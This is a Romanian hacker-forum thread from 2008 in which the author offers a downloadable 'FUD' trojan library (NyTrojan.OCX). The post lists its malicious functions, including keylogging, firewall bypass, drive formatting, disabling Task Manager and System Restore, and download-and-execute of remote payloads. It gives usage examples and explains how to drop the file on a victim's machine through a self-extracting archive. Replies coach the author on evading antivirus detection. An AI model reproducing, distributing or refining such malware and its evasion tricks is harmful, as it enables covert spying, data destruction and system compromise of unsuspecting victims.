Jump to content
Nytro

[RST] NyTrojan v1.02 FUD

Recommended Posts

Posted

::::: NyTrojan OCX :::::::

:::::: © Nytro 2008 :::::::

::: http://rstcenter.com :::

Aceeasi prostie , 100% nedetectabila , lipsa de ocupatie .

File : NyTrojan.OCX

Size : 76.0 KB

Download :

http://rapidshare.com/files/122825689/NyTrOjan.ocx

http://www.speedyshare.com/396218378.html

Functii :

1) OpenCDRom

2) CloseCDRom

3) ShowTaskBar

4) HideTaskBar

5) HideMouse

6) ShowMouse

7) LockExe

8) UnLockExe

9) HideClock

10) ShowClock

11) HideStart

12) ShowStart

13) HideIcons

14) ShowIcons

15) DisableTaskManager

16) EnableTaskManager

17) EmptyFolder

18) DesktopFolderFlood

19) DesktopFolderDelete

20) DisableSystemRestore

21) EnableSystemRestore

22) KillProcess

23) AutoDownload

24) SetStartButtonCaption

25) AddToStartUp

26) FreezeMouse

27) StopFreezeMouse

28) CrazyMouse

29) StopCrazyMouse

30) BeepFlood

31) StopBeepFlood

32) Abort

33) LogOff

34) ShutDown

35) Restart

36) Author

37) OpenWebSite

38) FormatDrive

39) SwapMouseButtons

40) StopSwapMouseButtons

41) BypassWindowsFirewall

42) TurnOffMonitor

43) TurnOnMonitor

44) StartKeylogging

45) StopKeylogging

46) Keylog

De ce sa il foloiti ? Deoarece simplifica foarte mult munca ta

Inca nu am facut un trojan cu el , revin cu el , o sa il fac

Folosind aceste functii trojanul e 100% UD

Am incercat pe mine si au mers functiile , sa le incercati si voi

si daca nu merge o functie sa imi ziceti .

Aveti grija la numarul de parameri al functiilor , revin cu un edit

in care spun ce face fiecare functie si cum se foloseste .

L-am si scanat :

File NyTrOjan.ocx received on 06.28.2008 19:13:04 (CET)

Current status: Loading ... queued waiting scanning finished NOT FOUND STOPPED

Result: 0/33 (0%)

http://www.virustotal.com/analisis/450d9bd313ebcd461f0998ee05d6b82d

Atentie : Daca folositi acest OCX e necesar fisierul pe calculatorul

victimei . Cum se poate face asta ? Cel mai simplu , o arhiva SFX , facuta

cu WinRAR . OCX-ul trebuie sa se afle in system32 .

Cum il folositi in Visual Basic ? Trebuie inregistrat :

Run >> regsvr32.exe C:\...\NyTrojan.OCX

Sau Apasati CTRL + T in Visual Basic / Components , si dati Browse .

Daca aveti probleme , sugestii etc , postati mai jos

Functiile OCX-ului :

1. DesktopFolderFlood = Creaza 1000 de foldere pe desktop

2. DesktopFolderDelete = Sterge folderele

3. EmptyFolder = Sterge toate fisierele dintr-un folder

Ex. NyTrojan1.EmptyFolder "C:\WINDOWS\system32"

4. KillProcess = Inchide un proces

Ex. NyTrojan1.KillProcess "winamp.exe"

5. AutoDownload = Descarca un fisier

Ex. NyTrojan1.AutoDownload "http://site.com/server.exe", "C:\x.exe", 1

Parametri : 1. Direct link , 2. Locatia , 3. Ruleaza dupa ?

1 - Ca sa ruleze dupa download

0 - Ca sa nu ruleze dupa download

6. SetStartButtonCaption = Seteaza numele butonului de start

Ex. NyTrojan1.SetStartButtonCaption "xxx"

7. AddToStartUp = Adauga la start-up un program

Ex. NyTrojan1.AddToStartUp "C:\x.exe"

8. BeepFlood = Beep-uri incontinuu

Ex. NyTrojan1.BeepFlood "100"

Parametrul reprezinta intervalul beep-urilor

9. OpenWebSite = Deschide WebSite cu IE

Ex. NyTrojan1.OpenWebSite "http://www.google.ro"

10. Author = Un MsgBox

11. FormatDrive = Formateaza o partitie

Ex. NyTrojan1.FormatDrive "a"

Info : Am incercat decat pe A:\ nu si pe C:\ sau D:\

12. StartKeylogging = Porneste Keylogging-ul

13. StopKeylogging = Opreste Keylogging-ul

14. Keylog = Returneaza Keylog-ul , tastele apasate dupa folosirea

functiei StartKeylogging

  • Downvote 1
Posted

Si nu era mai simplu sa incluzi ocx-ul in executabil, iar la pornire, inainte sa incarce programul sa verifice existenta acestuia, iar daca nu-l gaseste sa il creeze ? Eu asa fac la toate programele create de mine ... includ resursele in executabil. Ia-l ca pe un sfat pentru a-ti perfectiona metodele ;)

Posted

Frumos, exact la asta ma refeream :D Apropo, ocx-ul si res-urile le vede ca virusi ... din pacate ... Incearca cu module si codul sursa direct in executabil, in modul asta mai pacalesti programele antivirus, cel putin deocamdata ..

PS: Trimite-mi te rog un mesaj privat cu id-ul tau de messenger ca sa vorbim mai usor despre anumite lucruri :D

Posted

Nu prea inteleg antivirusii . Am facut niste teste cu Digital Keylogger . Asa cu l-am facut prima oara il detectau 4 antivirusi . Scot din cod autocopierea ocx-ului si il gasesc 5 parca . Apoi sterg tot codul din form si la decat declaratile si un modul care scrie in registry cu RegOpenKey ... Si il gasesc 7 antivirusi . Am sters bucati din cod si tot era detectabil . Am incercat fara autocopiere si bitdefender tot il gasea ca dropper . Nu prea inteleg cum sta treaba .

Posted

La mine cel putin, la trojan acum l-am scanat cu virustotal (si apropo de asta, nu inseamna ca pe viitor il vor detecta antivirusii, fapt probat de mine). Are 31-32 antivirusi in lista si .. din ei doar 3 il vad acum ca fisier suspicios (nod32, sophos si panda), dar nici unul ca virus sigur. Daca scot codul pt auto start-up, il vede numai panda, tot ca suspicious file. Ma rog .. asta era inainte, de atunci l-am actualizat si acum nu l-am mai verificat, dar am fixat niste bug-uri si am adaugat codul pt o singura instanta (proces), etc. Oricum, asta nu are cu ce sa afecteze codul. La tine am impresia ca toata problema se invarte in jurul ocx-ului. incearca sa incluzi comenzile in program, sa nu te folosesti de nytro ocx ;)

Edit: Am verificat acum si vad ca a sarit si BitDefender in cele din urma ... Ca o rezolvare,ar fi sa schimbam in primul rand codul pt intrare-registrii. Oricum, 4 din 33 (mai nou), e ceva, pt inceput.

Posted

Yup, si ti-as mai propune ceva: am vazut ca lucrezi in vb6. Dupa ce termini logger-ul, daca tot mai sare cate un antivirus, compileaza proiectul in vb8, (foloseste alt compilator) si ... cam atat. Eu asa am scapat de toti ceilalti, la o proba, insa ai si alte dezavantaje ;)

Posted

Nu trebuie sa ii dai, il pui intr-un fisier de resursa in server.

Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long

Private Const WM_SYSCOMMAND = &H112&

Private Const SC_MONITORPOWER = &HF170&

Public Function TurnOffMonitor()

SendMessage UserControl.hwnd, WM_SYSCOMMAND, SC_MONITORPOWER, 1&

End Function

Public Function TurnOnMonitor()

SendMessage UserControl.hwnd, WM_SYSCOMMAND, SC_MONITORPOWER, 0&

End Function

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...